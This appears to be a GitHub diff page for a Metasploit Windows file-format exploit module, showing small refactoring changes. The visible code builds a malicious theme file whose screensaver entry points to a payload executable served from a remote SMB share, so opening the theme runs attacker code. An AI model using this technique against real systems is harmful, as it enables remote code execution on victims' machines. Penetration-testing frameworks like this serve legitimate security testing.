File tree Expand file tree Collapse file tree 1 file changed +4
-3
lines changed
modules/exploits/windows/fileformat Expand file tree Collapse file tree 1 file changed +4
-3
lines changed Original file line number Diff line number Diff line change @@ -29,7 +29,7 @@ def initialize(info={})
2929 [
3030 'Eduardo Prado' , # Vulnerability discovery
3131 'juan vazquez' , # Metasploit module
32- 'Matthew Hall <[email protected] >' # Metasploit module refactored to use Remote::SMBFileServer 32+ 'Matthew Hall <[email protected] >' # Metasploit module refactored to use Msf::Exploit:: Remote::SMB::Server::Share 3333 ] ,
3434 'References' =>
3535 [
@@ -66,10 +66,11 @@ def initialize(info={})
6666 end
6767
6868 def exploit
69- print_status ( "Creating '#{ datastore [ 'FILENAME' ] } ' file ..." )
7069 self . file_contents = generate_payload_exe
7170 print_status ( "Malicious SCR available on #{ unc } ..." )
71+
7272 # Default Windows XP / 2003 theme modified
73+ print_status ( "Creating '#{ datastore [ 'FILENAME' ] } ' file ..." )
7374 theme = <<-EOF
7475; Copyright (c) Microsoft Corp. 1995-2001
7576
@@ -101,7 +102,7 @@ def exploit
101102ScreenSaveActive=0
102103
103104[boot]
104- SCRNSAVE.EXE=#{ @ unc}
105+ SCRNSAVE.EXE=#{ unc }
105106
106107[MasterThemeSelector]
107108MTSM=DABJDKT
You can’t perform that action at this time.
0 commit comments